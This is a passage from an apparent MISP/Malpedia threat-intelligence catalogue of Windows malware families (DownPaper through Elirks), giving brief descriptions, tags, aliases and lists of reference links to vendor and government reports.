https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://unit42.paloaltonetworks.com/doublezero-net-wiper/

https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

DownPaper

DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download and run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.

The tag is: misp-galaxy:malpedia="DownPaper"

DownPaper is also known as:

Table 3385. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper

https://www.infinitumit.com.tr/apt-35/

https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

http://www.clearskysec.com/charmingkitten/

DramNudge

The tag is: misp-galaxy:malpedia="DramNudge"

DramNudge is also known as:

Table 3386. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge

DreamBot

2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) 2014 Dreambot (Gozi ISFB variant)

In 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="DreamBot"

DreamBot is also known as:

Table 3388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot

https://lokalhost.pl/gozi_tree.txt

https://www.youtube.com/watch?v=EyDiIAtdI

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122

https://community.riskiq.com/article/30f22a00

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

Dridex

OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term." According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method." IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."

The tag is: misp-galaxy:malpedia="Dridex"

Dridex is also known as:

Table 3389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://viql.github.io/dridex/

https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/

https://www.secureworks.com/research/threat-profiles/gold-drake

https://malwarebookreports.com/cryptone-cobalt-strike/

https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://en.wikipedia.org/wiki/Maksim_Yakubets

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf

https://securityintelligence.com/dridexs-cold-war-enter-atombombing/

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://cyber-anubis.github.io/malware%20analysis/dridex/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/

https://twitter.com/TheDFIRReport/status/1356729371931860992

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/

https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf

https://www.atomicmatryoshka.com/post/malware-headliners-dridex

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays

https://twitter.com/Cryptolaemus1/status/1407135648528711680

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf

https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://community.riskiq.com/article/e4fb7245

https://unit42.paloaltonetworks.com/travel-themed-phishing/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/

https://intel471.com/blog/a-brief-history-of-ta505

https://home.treasury.gov/news/press-releases/sm845

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://assets.virustotal.com/reports/2021trends.pdf

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

http://www.secureworks.com/research/threat-profiles/gold-heron

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://community.riskiq.com/article/2cd1c003

https://www.secureworks.com/research/threat-profiles/gold-heron

https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes

https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/

https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/

https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office

https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/

https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/

https://twitter.com/felixw3000/status/1382614469713530883?s=20

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.youtube.com/watch?v=1VB15_HgUkg

https://blog.lexfo.fr/dridex-malware.html

https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77

https://muha2xmad.github.io/unpacking/dridex/

https://artik.blue/malware3

https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/privateloader-malware

https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction

https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state

DRIFTPIN

Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.

The tag is: misp-galaxy:malpedia="DRIFTPIN"

DRIFTPIN is also known as:

  • Spy.Agent.ORM

  • Toshliph

Table 3390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin

https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

Dripion

The tag is: misp-galaxy:malpedia="Dripion"

Dripion is also known as:

  • Masson

Table 3391. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion

https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

DriveOcean

Communicates via Google Drive.

The tag is: misp-galaxy:malpedia="DriveOcean"

DriveOcean is also known as:

  • Google Drive RAT

Table 3392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean

https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

DropBook

DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.

The tag is: misp-galaxy:malpedia="DropBook"

DropBook is also known as:

Table 3394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

Dtrack

Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes operations to upload a file to the victim’s computer, download a file from the victim’s computer, dump disk volume data, persistence and more.

A variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.

The tag is: misp-galaxy:malpedia="Dtrack"

Dtrack is also known as:

  • Preft

  • TroyRAT

Table 3396. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/

https://securelist.com/dtrack-targeting-europe-latin-america/107798/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

https://securelist.com/my-name-is-dtrack/93338/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage

https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

https://blog.macnica.net/blog/2020/11/dtrack.html

https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/

DUBrute

The tag is: misp-galaxy:malpedia="DUBrute"

DUBrute is also known as:

Table 3399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute

https://github.com/ch0sys/DUBrute

Dumador

The tag is: misp-galaxy:malpedia="Dumador"

Dumador is also known as:

Table 3401. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador

DUSTMAN

In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named "DUSTMAN" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack "DUSTMAN" after the filename and string embedded in the malware. "DUSTMAN" can be considered as a new variant of "ZeroCleare" malware, published in December 2019.

The tag is: misp-galaxy:malpedia="DUSTMAN"

DUSTMAN is also known as:

Table 3403. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman

https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://twitter.com/Irfan_Asrar/status/1213544175355908096

https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report

DynamicStealer

Dynamic Stealer is a Github Project C# written code by L1ghtN4n. This code collects passwords and uploads these to Telegram. According to Cyble this Eternity Stealer leverages code from this project and also Jester Stealer could be rebranded from it.

The tag is: misp-galaxy:malpedia="DynamicStealer"

DynamicStealer is also known as:

Table 3406. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer

https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/

EagerBee

According to Elastic, EagerBee loads additional capabilities using remotely-downloaded PE files, hosted in C2. However, its implementation and coding practices reveal a lack of advanced skills from the author, relying on basic techniques. During their research, they identified string formatting and underlying behavior that aligns with previous research attributed to a Chinese-speaking threat actor referred to as LuckyMouse (APT27, EmissaryPanda).

The tag is: misp-galaxy:malpedia="EagerBee"

EagerBee is also known as:

Table 3408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

EagleMonitorRAT

This RAT written in C# was derived from HorusEyesRat. It was modified by "Arsium" and published on GitHub. There is also a client builder included. Github Source: https://github.com/arsium/EagleMonitorRAT

The tag is: misp-galaxy:malpedia="EagleMonitorRAT"

EagleMonitorRAT is also known as:

Table 3409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eagle_monitor_rat

https://blog.cyble.com/2022/04/18/under-the-lens-eagle-monitor-rat/

EASYNIGHT

FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.

Examples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case "printwin.dll!gzwrite64" (breaking the file signature).

The tag is: misp-galaxy:malpedia="EASYNIGHT"

EASYNIGHT is also known as:

Table 3410. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight

https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://content.fireeye.com/api/pdfproxy?id=86840

Easy Stealer

Easy Stealer is a new information stealer written in Golang that is under active development. Since July 2023, the information stealer has been sold on the underground market, advertising a variety of capabilities, such as the ability to target crypto wallets and passwords. Based on VirusTotal data, it appears that developer test samples were uploaded in June 2023. The panel for the stealer is installed on the buyer’s own infrastructure, allowing for exclusive control. The stated pricing models are: $35 for 7 days, $115 for 30 days, and $250 for 90 days. Given its user-friendly panel design and the affordable price range, combined with similar capabilities to other information stealers, Easy Stealer is likely to see an increase in distribution among various cyber criminals as it continues through active development.

The tag is: misp-galaxy:malpedia="Easy Stealer"

Easy Stealer is also known as:

Table 3411. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.easystealer

https://www.bridewell.com/insights/blogs/detail/uncovering-the-easy-stealer-infostealer

EDA2

EDA2 is a successor of HiddenTear. Just like HiddenTear it was developed as an open-source project by a security researcher and published on Github. It was meant as "educational ransomware" and purposefully had flaws in the encryption process that allow decryption of ransomed files.

This backfired, when threat actors began to modify HiddenTear and EDA2 source code. Some modifications introduced bugs where encrypted files were destroyed, others fixed the encryption flaws and made decryption without a key impossible.

The tag is: misp-galaxy:malpedia="EDA2"

EDA2 is also known as:

Table 3412. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom

https://github.com/utkusen/eda2

https://www.bleepingcomputer.com/news/security/hidden-tear-ransomware-developer-blackmailed-by-malware-developers-using-his-code/

https://utkusen.com/blog/im-sorry-for-hidden-tear-eda2

https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/

https://twitter.com/JaromirHorejsi/status/815861135882780673

Egregor

According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim’s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim’s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named “RECOVER-FILES.txt” in all the compromised folders.

The tag is: misp-galaxy:malpedia="Egregor"

Egregor is also known as:

Table 3413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf

https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/

https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://twitter.com/redcanary/status/1334224861628039169

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/

https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/

https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html

https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf

https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/

https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html

https://www.group-ib.com/blog/egregor

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/

https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf

https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/

https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/

https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/

https://www.intrinsec.com/egregor-prolock/

https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/

https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html

ELECTRICFISH

The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.

The tag is: misp-galaxy:malpedia="ELECTRICFISH"

ELECTRICFISH is also known as:

Table 3416. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.us-cert.gov/ncas/analysis-reports/AR19-129A

ElectricPowder

The tag is: misp-galaxy:malpedia="ElectricPowder"

ElectricPowder is also known as:

Table 3417. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder

https://www.clearskysec.com/iec/

Elirks

Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Mostly attacks using Elirks occurring in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor. Multiple Elirks variants using Japanese blog services for the last couple of years.

The tag is: misp-galaxy:malpedia="Elirks"

Elirks is also known as:

Table 3418. Table References

Links

